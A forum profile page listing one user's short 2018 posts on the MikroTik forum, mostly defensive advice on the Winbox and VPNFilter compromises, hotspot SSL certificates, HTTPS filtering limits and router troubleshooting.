This is indeed a mixed content warning. The connection to the page is secure, but the page requests insecure elements such as scripts which means the integrity of the page cannot be trusted as the insecure scripts could modify it.
by R1CH
Sun Aug 05, 2018 5:08 pm
Forum: Wireless Networking
Topic: PMKID Attack - clientless WPA2/WPA PSK attack
Replies: 6
Views: 3129

Re: PMKID Attack - clientless WPA2/WPA PSK attack

This seems like it would only affect 802.1x / EAP setups.
by R1CH
Sun Aug 05, 2018 5:02 pm
Forum: General
Topic: cutting off internet
Replies: 6
Views: 616

Re: cutting off internet

Use firewall time matcher or scheduler.
by R1CH
Sun Aug 05, 2018 2:59 am
Forum: General
Topic: Problems with SSL Godaddy Hotspot
Replies: 7
Views: 912

Re: Problems with SSL Godaddy Hotspot

Everything is working fine. There is nothing more to do.

Phones open the webpage automatically as a convenience, in desktop Chrome you have to click "Connect". You cannot alter how the phones or browsers behave.
by R1CH
Sat Aug 04, 2018 3:27 pm
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 329
Views: 87463

Re: Winbox vulnerability: please upgrade

It's disappointing that both the httpd vulnerability and now the winbox vulnerability required mass exploitation before Mikrotik sent an email. Why not send these emails on day 1?
by R1CH
Thu Aug 02, 2018 12:56 pm
Forum: Announcements
Topic: Security announcement blog
Replies: 120
Views: 38257

Re: Security announcement blog

...ignored upgrading because they thought their router wasn't classified as "unsecured"... Any port open to public networks is unsecure! The point is if port is closed by firewall or by disabling service then it is considered secure. So services like OpenVPN and IPsec in Mikrotik are "unsecure" as ...
by R1CH
Wed Aug 01, 2018 8:11 pm
Forum: General
Topic: Unexpected start message
Replies: 6
Views: 637

Re: Unexpected start message

How would malware get access to run arbitrary cp commands? This looks more like a bug in RouterOS, unless there is a new exploit available to elevate winbox to shell access (which is rumored to be possible).
by R1CH
Wed Aug 01, 2018 5:03 pm
Forum: Announcements
Topic: Security announcement blog
Replies: 120
Views: 38257

Re: Security announcement blog

!) winbox - fixed vulnerability that allowed to gain access to an unsecured router; ... Another example that shows how important is to read changelog. That is why we have tried to upgrade it a little bit after few last releases in order to highlight major fixes and improvements. I would actually us...
by R1CH
Wed Aug 01, 2018 2:54 pm
Forum: Announcements
Topic: Security announcement blog
Replies: 120
Views: 38257

Re: Security announcement blog

I also never received an email about the winbox exploit. Mikrotik claims to have sent it, does anyone actually have a copy of it?
by R1CH
Mon Jul 30, 2018 1:59 pm
Forum: General
Topic: SSL Certificate Issue
Replies: 1
Views: 245

Re: SSL Certificate Issue

Do you have hotspot enabled on any of the routers? Looks like something is intercepting your connections, or your routers are compromised and your DNS has been modified.
by R1CH
Mon Jul 30, 2018 1:57 pm
Forum: General
Topic: Mikrotik + Squid Proxy server to log HTTPS traffic
Replies: 2
Views: 941

Re: Mikrotik + Squid Proxy server to log HTTPS traffic

You cannot log HTTPS traffic. Only CONNECT is a supported Squid proxy method, meaning Squid operates in a simple TCP passthrough mode. The most you can get is the hostname that clients are connecting to, and they must be explicitly configured to use the proxy - transparent proxying does not work for...
by R1CH
Fri Jul 27, 2018 6:33 pm
Forum: General
Topic: 185.153.198.228 Has been BUSY
Replies: 9
Views: 1052

Re: 185.153.198.228 Has been BUSY

Exposing your winbox port is asking to be compromised when the next exploit is found. Best to firewall it.
by R1CH
Fri Jul 27, 2018 6:32 pm
Forum: General
Topic: chr support fast path?
Replies: 6
Views: 655

Re: chr support fast path?

The presentation says the VMXNET3 NIC supports fastpath. Are you using that?
by R1CH
Fri Jul 27, 2018 6:29 pm
Forum: General
Topic: How to optimize VPN tunnel over high latency link?
Replies: 3
Views: 552

Re: How to optimize VPN tunnel over high latency link?

If using TCP you probably need to tune the send / receive windows. A single TCP connection has a hard time reaching maximum bandwidth over high speed links. You can experiment with these settings: https://fasterdata.es.net/host-tuning/ms-windows/ RouterOS also has a single TCP connection bandwidth l...
by R1CH
Fri Jul 27, 2018 4:56 pm
Forum: Wireless Networking
Topic: Removing Mikrotik elements from beacons
Replies: 15
Views: 2288

Re: Removing Mikrotik elements from beacons

Bump.. still annoyed by the fact that anyone can see the version numbers.
by R1CH
Fri Jul 27, 2018 4:54 pm
Forum: Wireless Networking
Topic: What are the different flags when doing a scanner
Replies: 1
Views: 341

Re: What are the different flags when doing a scanner

A = active, recently appeared in a scan. If this is missing, means AP is no longer in range or has weak signal P = privacy, network is secured by some method R = RouterOS network B = bridged RouterOS network Unfortunately there's no way to stop advertising as a RouterOS network, this also gives away...
by R1CH
Fri Jul 27, 2018 3:00 pm
Forum: General
Topic: How to optimize VPN tunnel over high latency link?
Replies: 3
Views: 552

Re: How to optimize VPN tunnel over high latency link?

What kind of file copy? If you're trying to do Windows file sharing, it has terrible performance at higher latencies. There's no real workaround, the protocol is just not meant for WAN use. Make sure both sides are set up for SMB3 if possible as this does provide some small improvement.
by R1CH
Thu Jul 26, 2018 1:21 pm
Forum: Announcements
Topic: Security announcement blog
Replies: 120
Views: 38257

Re: Security announcement blog

Is there a way to sign up for email announcements of new articles too?
by R1CH
Wed Jul 25, 2018 7:26 pm
Forum: General
Topic: Mikrotik Routers Compromised......please READ [SOLVED]
Replies: 8
Views: 1645

Re: Mikrotik Routers Compromised......please READ [SOLVED]

If you weren't running latest RouterOS you will have been compromised by various exploits, safest way forward is netinstall (and change all passwords).
by R1CH
Wed Jul 25, 2018 7:25 pm
Forum: General
Topic: Blocking facebook
Replies: 12
Views: 16407

Re: Blocking facebook

That doesn't really work when browsers like Firefox will soon be defaulting to DNS over HTTPS.
by R1CH
Mon Jul 23, 2018 4:31 pm
Forum: General
Topic: Block extensions downloads on HTTPS sites
Replies: 10
Views: 907

Re: Block extensions downloads on HTTPS sites

Not possible unless you own all the client devices and install MITM root certs.
by R1CH
Tue Jul 17, 2018 4:18 pm
Forum: RouterBOARD hardware
Topic: RB850Gx2 vs RB450Gx4
Replies: 49
Views: 10157

Re: RB850Gx2 vs RB450Gx4

Anyone tried getting OpenWRT running on one of these yet? Looks like a great board for non-ROS systems.
by R1CH
Mon Jul 16, 2018 2:26 pm
Forum: General
Topic: Problems with SSL Godaddy Hotspot
Replies: 7
Views: 912

Re: Problems with SSL Godaddy Hotspot

Your screenshot is showing everything working perfectly - the browser has detected the hotspot and all you have to do is click "Connect".
by R1CH
Fri Jul 13, 2018 7:37 pm
Forum: General
Topic: Router wireless speed deteriirated
Replies: 1
Views: 257

Re: Router wireless speed deteriirated

Are you sure your router isn't hacked and all the bandwidth being used by attackers? 6.39 is vulnerable to many exploits, if you have any ports exposed it's likely hacked. You should netinstall to 6.42.6 to remove any malware. If you're sure it isn't compromised, try changing channels on the wifi. M...
by R1CH
Fri Jul 13, 2018 2:38 pm
Forum: RouterBOARD hardware
Topic: CRS317 keeps calling "home" (MikroTik cloud) [SOLVED]
Replies: 1
Views: 504

Re: CRS317 keeps calling "home" (MikroTik cloud) [SOLVED]

You also need to disable timezone auto detection.
by R1CH
Fri Jul 13, 2018 2:37 pm
Forum: General
Topic: .npk files auto deleted
Replies: 18
Views: 2209

Re: .npk files auto deleted

This definitely sounds like malware that is preventing you from patching the router to a secure version. Safest way forward is to fornat / netinstall.
by R1CH
Mon Jul 09, 2018 7:56 pm
Forum: Announcements
Topic: Winbox v3.16 released!
Replies: 63
Views: 26775

Re: Winbox v3.16 released!

Winbox self-update is still vulnerable to MITM to execute arbitrary code. (ref: ticket 2018052822004611)
by R1CH
Mon Jul 09, 2018 7:34 pm
Forum: RouterBOARD hardware
Topic: CAP ac bad Antenna design?
Replies: 95
Views: 20921

Re: CAP ac bad Antenna design?

There is no Wave2 support in RouterOS. Maybe in RouterOS v7 when the drivers / kernel are updated.
by R1CH
Sun Jul 08, 2018 1:23 am
Forum: Wireless Networking
Topic: Backup 5GHz link for LHG 60
Replies: 4
Views: 1044

Backup 5GHz link for LHG 60

Since rain or other obstacles can cause the 60 GHz link to drop completely, I'm investigating whether to run a 5 GHz link also for redundancy. Failure should be ideally detected within a second and traffic transparently routed to the 5 GHz link until the 60 GHz link is back online. Both sides of the...
by R1CH
Sat Jul 07, 2018 2:42 pm
Forum: General
Topic: DNSSEC
Replies: 33
Views: 10085

Re: DNSSEC

Using an external resolver also fixes latency issues caused by high CPU, routed packets through the kernel still proceed but user mode DNS server is starved, leading to slow DNS response. I also couldn't find a way to do DNS rebinding protection with Mikrotik which was the main reason I switched away.
by R1CH
Sat Jul 07, 2018 2:40 pm
Forum: General
Topic: hAP ac2 crashes?
Replies: 5
Views: 827

Re: hAP ac2 crashes?

I had a wAP AC behave very similarly during a switch loop which is why I mention this. After fixing the loop all devices except the wAP AC came back without intervention.
by R1CH
Fri Jul 06, 2018 6:19 pm
Forum: Wireless Networking
Topic: Client roaming with different subnets and DHCP
Replies: 0
Views: 285

Client roaming with different subnets and DHCP

I was wondering if anyone has any experience with a single SSID roaming setup but using different subnets behind the AP. For example, two SSIDs that share the same name / key, but one assigns in 192.168.88.0/24 space and the other in 10.10.10.0/24: Would most clients issue a new DHCP request when th...
by R1CH
Fri Jul 06, 2018 6:08 pm
Forum: General
Topic: hAP ac2 crashes?
Replies: 5
Views: 827

Re: hAP ac2 crashes?

I would suspect a faulty switch or a loop / broadcast storm. Try monitoring traffic on one of the devices connected to the switch during an outage.
by R1CH
Fri Jul 06, 2018 6:06 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

I made a checking tool like that as soon as it was announced, but realized it's probably useless as this ssler module is very likely targeted to high profile victims and won't be enabled on most infections.
by R1CH
Thu Jul 05, 2018 12:17 am
Forum: General
Topic: Web Proxy Hacked
Replies: 8
Views: 2164

Re: Web Proxy Hacked

You should format and netinstall after being compromised. Winbox access can supposedly be escalated to shell access, where all kinds of malware could be lurking with no way to detect.
by R1CH
Wed Jul 04, 2018 7:51 pm
Forum: General
Topic: PCI Compliance - CVE-2015-4000
Replies: 7
Views: 826

Re: PCI Compliance - CVE-2015-4000

For command line scanning of DH parameters, give this a try: https://github.com/GDSSecurity/SSH-Weak-DH For those curious, strong-crypto=yes enables 2048 bit DH parameters and disables 3des / md5 from ciphers / HMAC but dsa keys and sha1 remain enabled. /ip ssh set strong-crypto=yes: [+] STRONG. Alg...
by R1CH
Wed Jul 04, 2018 2:56 pm
Forum: General
Topic: Block HTTPS sites
Replies: 11
Views: 1826

Re: Block HTTPS sites

Please listen to the people saying this is not possible. If anyone could redirect HTTPS, what's to stop anyone on the internet doing that to google or a banking website? Redirecting HTTPS is only possible if you also own all the client devices and have installed a MITM root certificate into the OS. ...
by R1CH
Wed Jul 04, 2018 2:24 am
Forum: RouterBOARD hardware
Topic: IEEE 802.11ac (wave 2)
Replies: 14
Views: 4746

Re: IEEE 802.11ac (wave 2)

RouterOS v7? Probably. Who knows when though...
by R1CH
Wed Jul 04, 2018 2:22 am
Forum: General
Topic: LAN side bridge forward filtering options?
Replies: 4
Views: 480

Re: LAN side bridge forward filtering options?

LAN to LAN packets won't touch your bridge - they will go directly through the ports the clients are connected to on the VLAN switch. dadaniel has the right idea - you need to configure port isolation on whatever device the clients are physically connecting to.
by R1CH
Wed Jul 04, 2018 12:40 am
Forum: General
Topic: PCI Compliance - CVE-2015-4000
Replies: 7
Views: 826

Re: PCI Compliance - CVE-2015-4000

SSH does not use TLS/SSL, using testssl.sh with it will not work. Try https://tls.imirhil.fr/ssh

Results of RouterOS SSH server don't look very promising, no strong ciphers, HMACs or host keys and plenty of bad ones. https://tls.imirhil.fr/ssh/demo.mt.lv:22
by R1CH
Tue Jul 03, 2018 5:30 pm
Forum: General
Topic: Slow ethernet directly from rb750Gr3 port 2 [SOLVED]
Replies: 9
Views: 708

Re: Slow ethernet directly from rb750Gr3 port 2 [SOLVED]

I would suggest removing those blacklist downloads, they pose a huge security risk. If someone is able to MITM your connection or the web host is compromised, your router is compromised since it's essentially executing arbitrary commands from a remote host (!).
by R1CH
Mon Jul 02, 2018 5:35 pm
Forum: General
Topic: [Feature request] Wireguard
Replies: 92
Views: 21460

Re: [Feature request] Wireguard

And please use the reference implementation! I'm getting tired of Mikrotik's re-implementations of software which introduce security bugs and miss important features.
by R1CH
Mon Jul 02, 2018 5:28 pm
Forum: Announcements
Topic: Winbox v3.16 released!
Replies: 63
Views: 26775

Re: Winbox v3.16 released!

Hopefully it uses a whitelist approach and only executes DLLs with known hashes.
by R1CH
Sat Jun 30, 2018 6:18 pm
Forum: General
Topic: Block HTTPS sites
Replies: 11
Views: 1826

Re: Block HTTPS sites

Blocking is possible, redirecting is not as it would require breaking HTTPS security. Simply drop outbound TCP/UDP port 443.
by R1CH
Fri Jun 29, 2018 9:21 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1599

Re: Why am I getting this firewall entry???

I think I was a little too quick with my first assessment. After some more thought I believe this is actually closer to your network. Something in the outbound network path is generating the TTL exceeded messages with the wrong interface / IP address and these are injected back into the internet. Yo...
by R1CH
Fri Jun 29, 2018 5:29 pm
Forum: General
Topic: hotspot doesn't open browser popup on captive portal when clients connect
Replies: 4
Views: 1682

Re: hotspot doesn't open browser popup on captive portal when clients connect

You shouldn't have any whitelisting. If you allow those domains then the device will fail hotspot detection and never prompt. There's no point trying to trick the phones, you'll end up with annoyed non-users who can't access the internet and annoyed users who can't log in to your portal.
by R1CH
Thu Jun 28, 2018 6:14 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1599

Re: Why am I getting this firewall entry???

That's correct, it's caused by a non-translated packet exiting from a remote NAT and making it across the internet with an invalid source IP. They're quite rare, but if you run a busy enough network / website you'll see quite a lot of them. Some stats from one of my websites which filter these on IN...
by R1CH
Thu Jun 28, 2018 5:17 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1599

Re: Why am I getting this firewall entry???

This is caused by a combination of bad ISPs that don't do BCP38 and bad routers that don't NAT properly. An outbound packet from your network goes across the internet to some host behind a poor quality NAT router. The host PC / network responds with an ICMP error (TTL exceeded, port unreachable or s...
by R1CH
Thu Jun 28, 2018 2:58 pm
Forum: Wireless Networking
Topic: Users Not Being Directed to the Hotspot Login Screen
Replies: 6
Views: 1168

Re: Users Not Being Directed to the Hotspot Login Screen

Haven't used hotspot before, but this certainly doesn't look right:
/ip dhcp-server network
add address=192.188.254.254/32
   IPv4 Address. . . . . . . . . . . : 192.188.254.251(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.255
You probably want a /24 network at least?
by R1CH
Wed Jun 27, 2018 9:34 pm
Forum: General
Topic: fasttrack connection question
Replies: 3
Views: 310

Re: fasttrack connection question

Unfortunately this will not work. Your access control rules need to run before marking the connection for fasttrack, once the connection is fasttracked it will no longer hit the forward rule table.
by R1CH
Wed Jun 27, 2018 7:50 pm
Forum: General
Topic: WPA3 on existing Mikrotik routers/APs [SOLVED]
Replies: 11
Views: 8171

Re: WPA3 on existing Mikrotik routers/APs [SOLVED]

Hmm I just looked it up, 802.11w is actually required for 802.11ac certification, so Mikrotik is technically shipping uncertified implementations :D. Hopefully they don't ignore it for WPA3 too. Regarding my other points - with spectral scan I meant an actual RF scan of the frequency, not a simple p...
by R1CH
Wed Jun 27, 2018 2:46 pm
Forum: General
Topic: WPA3 on existing Mikrotik routers/APs [SOLVED]
Replies: 11
Views: 8171

Re: WPA3 on existing Mikrotik routers/APs [SOLVED]

The SAE handshake doesn't look like a huge innovation, was hoping for something more in line with modern TLS, but I guess that's what happens when you have for-profit industry alliances vs open standards bodies. The big question is how long will it take Mikrotik to implement WPA3? We have no 802.11a...
by R1CH
Wed Jun 27, 2018 2:37 pm
Forum: General
Topic: /ip cloud (ddns + time) = Error: request timed out (90% of time)
Replies: 9
Views: 9406

Re: /ip cloud (ddns + time) = Error: request timed out (90% of time)

There still seems to be a major DNS misconfiguration on the domain used for the IP cloud services. Perhaps fixing this would improve reliability.

https://r-1.ch/r1dns/dnscheck.cgi?domain=mynetname.net
by R1CH
Wed Jun 27, 2018 1:40 am
Forum: General
Topic: S.O.S New vurnelabilty on 6.42.3 ????? NO [SOLVED]
Replies: 26
Views: 11695

Re: S.O.S New vurnelabilty on 6.42.3 ????? [SOLVED]

Did you do a reinstall after being compromised? Winbox access can be escalated to shell access, where attackers can drop undetectable backdoors and other exploits. Changing passwords might be OK if you're lucky and didn't get hit by a sophisticated exploit, but reinstalling is the only truly safe op...
by R1CH
Mon Jun 25, 2018 8:14 pm
Forum: General
Topic: unknown admin with unknown IP address loges in my mikrotik router via API [SOLVED]
Replies: 6
Views: 800

Re: unknown admin with unknown IP address loges in my mikrotik router via API [SOLVED]

You should also change all passwords after updating, since all user accounts are exposed.
by R1CH
Thu Jun 21, 2018 12:40 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

toknowall.com is a sinkhole, nothing bad will come from hosts contacting it. Cloudflare IPs rotate often, you are probably blocking hundreds or thousands of legitimate sites with such wide rules.

You should instead redirect toknowall.com locally and monitor / block hosts that way.
by R1CH
Wed Jun 20, 2018 7:28 pm
Forum: General
Topic: Maximum speed on 10 Gb port for mikrotik CCR1036
Replies: 6
Views: 715

Re: Maximum speed on 10 Gb port for mikrotik CCR1036

9.9Gbps maybe you have 1.25Gbps SFP module. Single stream? Wasn't there a limitation, with the way ROS (not) distributed the load of a single stream, among the cores? Was it addressed recently? I think you have the right idea here. If it's a single TCP stream with no firewall rules then ~ 1.2gbps s...
by R1CH
Wed Jun 20, 2018 7:21 pm
Forum: General
Topic: Windows 10 Hotspot Problem (V6.38.1)
Replies: 2
Views: 475

Re: Windows 10 Hotspot Problem (V6.38.1)

You should be more concerned about running such an old version of RouterOS! Your router may already be compromised due to various remote exploits in that version, update it ASAP and check for signs of compromise. As for the hotspot problem, have you tried with different browsers? I would expect the ...
by R1CH
Tue Jun 19, 2018 7:13 pm
Forum: Announcements
Topic: v6.42.4 [current]
Replies: 93
Views: 16190

Re: v6.42.4 [current]

I'm also not a fan of the labeling of firmware by RouterOS version. Previously, after updating RouterOS, I could easily see if firmware was outdated and choose to do a 2nd reboot. Now it always appears outdated, even if there were no changes between versions.
by R1CH
Tue Jun 19, 2018 6:54 pm
Forum: Scripting
Topic: Adding SSL to API
Replies: 2
Views: 884

Re: Adding SSL to API

You should use fsockopen ("tls://$ip"). Be aware that without a valid certificate this will fail.
by R1CH
Tue Jun 19, 2018 6:35 pm
Forum: General
Topic: hotspot doesn't open browser popup on captive portal when clients connect
Replies: 4
Views: 1682

Re: hotspot doesn't open browser popup on captive portal when clients connect

Make sure you're redirecting all HTTP requests to your portal, don't allow whitelists for gstatic.com etc. Other than that it's up to the device, you can't really influence it.
by R1CH
Mon Jun 18, 2018 7:54 pm
Forum: General
Topic: bug persists after updating to 6.42.3
Replies: 14
Views: 6135

Re: bug persists after updating to 6.42.3

If you didn't change passwords after upgrading to fix the winbox exploit, this is likely how they are gaining access. Change all passwords, preferably after netinstall to ensure no remaining backdoors.
by R1CH
Mon Jun 18, 2018 7:43 pm
Forum: Wireless Networking
Topic: hacking-router
Replies: 2
Views: 1144

Re: hacking-router

Your router is compromised due to the winbox bug, you should format / netinstall and change all passwords. Simply updating is not enough, as you must also change all passwords. Removing the scripts will prevent the problem for now, but who knows what other backdoors are lurking.
by R1CH
Mon Jun 18, 2018 7:08 pm
Forum: General
Topic: cant' activate purchased SSL certificate for hotspot
Replies: 19
Views: 3077

Re: cant' activate purchased SSL certificate for hotspot

Any signed cert should be fine, price is not important, even a free one from Let's Encrypt should work. ERR_SSL_VERSION_OR_CIPHER_MISMATCH seems to indicate either the hotspot or your browser isn't using modern protocols / ciphers. I don't know if there are any options in RouterOS, but make sure to ...
by R1CH
Mon Jun 18, 2018 4:57 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

Telnet is well known to be insecure, SSH is the replacement for it (although why telnet is still provided and enabled by default is another question...) Winbox is a proprietary protocol that claims to be "secure" but is vulnerable to MITM, so the fault lies with it. Hopefully this a pointless discus...
by R1CH
Fri Jun 15, 2018 6:49 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

The only email I got was about the old httpd exploit (below). Maybe something went wrong with the sending of the emails? Subject: MikroTik: URGENT security advisory "It has come to our attention that a rogue botnet is currently scanning random public IP addresses to find open Winbox (8291) and WWW (...
by R1CH
Fri Jun 15, 2018 6:37 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

For vulnerabilities that allow remote code execution or bypassing of authentication, Mikrotik should really be sending out a security advisory emails to every registered customer / active forum user. The winbox exploit for example is much worse than the httpd bug, and that was deserving of an email....
by R1CH
Fri Jun 15, 2018 5:22 pm
Forum: General
Topic: Login failure critical notification
Replies: 2
Views: 393

Re: Login failure critical notification

Bandwidth test server is hidden! It isn't listed under services but under tools / btest server. If people are able to try to log into it though, this suggests your firewall configuration is incomplete.
by R1CH
Thu Jun 14, 2018 7:17 pm
Forum: General
Topic: cant' activate purchased SSL certificate for hotspot
Replies: 19
Views: 3077

Re: cant' activate purchased SSL certificate for hotspot

There seems to be a missing intermediary cert, I'm not entirely sure how RouterOS handles this but try importing the following instead (I added the intermediate cert to the chain).
by R1CH
Thu Jun 14, 2018 4:46 pm
Forum: General
Topic: cant' activate purchased SSL certificate for hotspot
Replies: 19
Views: 3077

Re: cant' activate purchased SSL certificate for hotspot

That message means the .crt you supplied to the hotspot wasn't signed properly. Make sure it's the certificate you got from namecheap and not one generated by RouterOS.

You can also link the .crt file here and I can take a look. Make sure you never post the private key though!
by R1CH
Wed Jun 13, 2018 6:29 pm
Forum: General
Topic: cant' activate purchased SSL certificate for hotspot
Replies: 19
Views: 3077

Re: cant' activate purchased SSL certificate for hotspot

If you're running 6.40.1 your router may already be compromised as you have not installed critical security patches, you should update ASAP and check for signs of compromise (modified DNS, additional users, VPN tunnels, etc). You use testssl.sh from any Linux system and test it against your hotspot....
by R1CH
Wed Jun 13, 2018 4:51 pm
Forum: General
Topic: cant' activate purchased SSL certificate for hotspot
Replies: 19
Views: 3077

Re: cant' activate purchased SSL certificate for hotspot

Make sure your RouterOS is up to date. You can use something like https://testssl.sh for verifying that TLS support is working correctly.
by R1CH
Wed Jun 13, 2018 4:45 pm
Forum: General
Topic: problems resolving IP Cloud addresses
Replies: 13
Views: 1360

Re: problems resolving IP Cloud addresses

GTLD nameservers are still returning the old records. May want to check that.

https://r-1.ch/r1dns/dnscheck.cgi?domain=mynetname.net
by R1CH
Tue Jun 12, 2018 2:38 pm
Forum: General
Topic: cant' activate purchased SSL certificate for hotspot
Replies: 19
Views: 3077

Re: cant' activate purchased SSL certificate for hotspot

Yes, you need to be able to prove ownership of it in some way, eg email to postmaster@example.com should be receivable or if you use free Let's Encrypt cert, challenge files at example.com/.well-known/acme-challenge.
by R1CH
Mon Jun 11, 2018 7:02 pm
Forum: General
Topic: cant' activate purchased SSL certificate for hotspot
Replies: 19
Views: 3077

Re: cant' activate purchased SSL certificate for hotspot

You need a FQDN to be able to get a valid CA signed cert. Namecheap isn't going to allow you to sign "myCa" since you have no proof of ownership over that name.

Use something like hotspot.your-isp.com.
by R1CH
Mon Jun 11, 2018 12:54 pm
Forum: RouterBOARD hardware
Topic: IEEE 802.11ac (wave 2)
Replies: 14
Views: 4746

Re: IEEE 802.11ac (wave 2)

There's no Wave2 support for anything yet.
by R1CH
Fri Jun 08, 2018 5:23 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

Thanks, so other than the microtik update service there is really no need for port 80 traffic on the output chain (from the router either with a source port of 80 or with a destination port 0f 80). Be aware that compromised devices could serve 2nd stage payloads from any port - blocking OUTPUT port...
by R1CH
Thu Jun 07, 2018 7:31 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

One thing I have started doing as a preventative measure - block everything in the OUTPUT chain except necessary services (eg dhcp client, sntp client, etc). Most exploits can only carry a very small payload, which often downloads a "real" payload from some other infected device. By restricting outb...
by R1CH
Thu Jun 07, 2018 7:29 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

So , anybody got some ideas on how to do this and what can be found/checked/modified/fixed/enhanced/expanded ? I would guess the bad guys already do something like this all of the time when looking for possible exploits on Internet connected devices. This is definitely possible, you should be able ...
by R1CH
Thu Jun 07, 2018 7:22 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

Just for the record, I don't think people need to check changelogs "constantly" but probably at least once a year might be cool. Maybe even every six months? Might be a stretch but just actually *looking* would be a start for most. The winbox exploit was a 0-day - meaning it was being exploited in ...
by R1CH
Thu Jun 07, 2018 7:18 pm
Forum: Announcements
Topic: Winbox 3.14 released!
Replies: 77
Views: 24527

Re: Winbox 3.14 released!

This version 3.14 works very slowly before connecting to the router. In version 3.13 or 3.12 is connect very fast to riuter *) make all connections in secure mode (all data is encrypted with AES128-CBC-SHA); so it requires more CPU processing power from both sides and more information exchange. Thi...
by R1CH
Thu Jun 07, 2018 5:20 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

There is unfortunately no easy way to tell, since Mikrotik doesn't allow us shell access to our routers to perform this kind of examination. There is a "check installation" feature but unfortunately it does not check if there are files on the router that are unaccounted for, even though this has be...
by R1CH
Thu Jun 07, 2018 4:43 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

how to determine if my router is infected? There is unfortunately no easy way to tell, since Mikrotik doesn't allow us shell access to our routers to perform this kind of examination. Lack of shell access also makes it hard to tell if upgrading a compromised device actually removes the compromise, ...
by R1CH
Thu Jun 07, 2018 3:48 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

The fact that Mikrotik is still on the list due to them seeing Mikrotik routers still being hit by this means one thing only for Mikrotik users. They have failed to keep their routers current and are still running over a YEAR OLD (plus) version of ROS. Regardless of this virus attack, that is just ...
by R1CH
Thu Jun 07, 2018 2:53 pm
Forum: General
Topic: HELP! Strange port forwarding behaviour in 951G-2HnD [SOLVED]
Replies: 3
Views: 671

Re: HELP! Strange port forwarding behaviour in 951G-2HnD

I've seen several NVR systems where the web interface runs on one port, but the video streams are all separate ports that are connected to directly via RTP / RTSP. You should connect locally and use a utility like TCPView to figure out which ports are being accessed, then forward all of them.
by R1CH
Wed Jun 06, 2018 7:25 pm
Forum: General
Topic: Which mikrotik router for OpenVPN
Replies: 8
Views: 2624

Re: Which mikrotik router for OpenVPN

I would strongly advise against OpenVPN on Mikrotik for the above reasons. Performance is very poor with TCP-in-TCP, see http://sites.inka.de/bigred/devel/tcp-tcp.html for explanations.
by R1CH
Wed Jun 06, 2018 4:32 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

A new technical update was published, which expands the compromised device list to include almost all Mikrotik boards (CCR1009 (new), CCR1016, CCR1036, CCR1072, CRS109 (new), CRS112 (new), CRS125 (new), RB411 (new), RB450 (new), RB750 (new), RB911 (new), RB921 (new), RB941 (new), RB951 (new), RB952 ...
by R1CH
Wed Jun 06, 2018 2:22 pm
Forum: General
Topic: RouterOS v7.0 beta1 - when?
Replies: 609
Views: 152029

Re: RouterOS v7.0 beta1 - when?

One reason is probably that when you use opensource software and keep tracking all the updates, you end up with more and more bloated software that does not fit into a space-limited router anymore. It works fine on the PC platform where space and other resource usage (CPU) has grown with the code, ...
by R1CH
Tue Jun 05, 2018 4:17 pm
Forum: General
Topic: RouterOS v7.0 beta1 - when?
Replies: 609
Views: 152029

Re: RouterOS v7.0 beta1 - when?

This is the difficulty :D If we were using all open source code, it would be easy to upgrade. Now we must only rely on ourselves to upgrade all programs. Why is Mikrotik so against using open source software? We would have working 802.11ac Wave2, 5 GHz spectral scan, OpenVPN UDP support, more secur...
by R1CH
Tue Jun 05, 2018 2:26 pm
Forum: Wireless Networking
Topic: New standard 802.11ax
Replies: 25
Views: 6477

Re: New standard 802.11ax

Looks like 802.11ax consumer devices will be hitting the market later this year. I really hope Mikrotik is working on something too!

https://www.anandtech.com/show/12871/as ... ax-routers
by R1CH
Sun Jun 03, 2018 6:58 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

Again and again ... it seems be kind of sport nowadays to ask "Is Mikrotik volunerable because someone is scanning particular port?" If you disable or limit sources's IPs for all new incoming connections then there should be no problem at all. If you not secure your router then offenders will try t...
by R1CH
Sat Jun 02, 2018 10:47 pm
Forum: General
Topic: Blocking Virus from Mikrotik
Replies: 15
Views: 3226

Re: Blocking Virus from Mikrotik

Perhaps your router was compromised and an attacker is intercepting your DNS.
by R1CH
Sat Jun 02, 2018 7:37 pm
Forum: Announcements
Topic: VPNfilter official statement
Replies: 191
Views: 76268

Re: VPNfilter official statement

Apparently VPNFilter is now scanning for port 2000 (btest server) on Mikrotik routers. Another exploit? Not many admins are aware that this service runs by default.
by R1CH
Fri Jun 01, 2018 7:30 pm
Forum: General
Topic: I can't set a DNS name that starts with a digit.
Replies: 3
Views: 652

Re: I can't set a DNS name that starts with a digit.

Seems like Mikrotik is not RFC compliant here. 2.1 Host Names and Numbers The syntax of a legal Internet host name was specified in RFC-952 [DNS:4]. One aspect of host name syntax is hereby changed: the restriction on the first character is relaxed to allow either a letter or a digit. Host software ...
by R1CH
Thu May 31, 2018 6:25 pm
Forum: General
Topic: Upgraded to 6.42.3 - some SSL trouble from clients
Replies: 4
Views: 690

Re: Upgraded to 6.42.3 - some SSL trouble from clients

Sounds like you have a firewall issue, SSL should be no different to other traffic unless affected by rules (or perhaps some other middlebox is interfering).
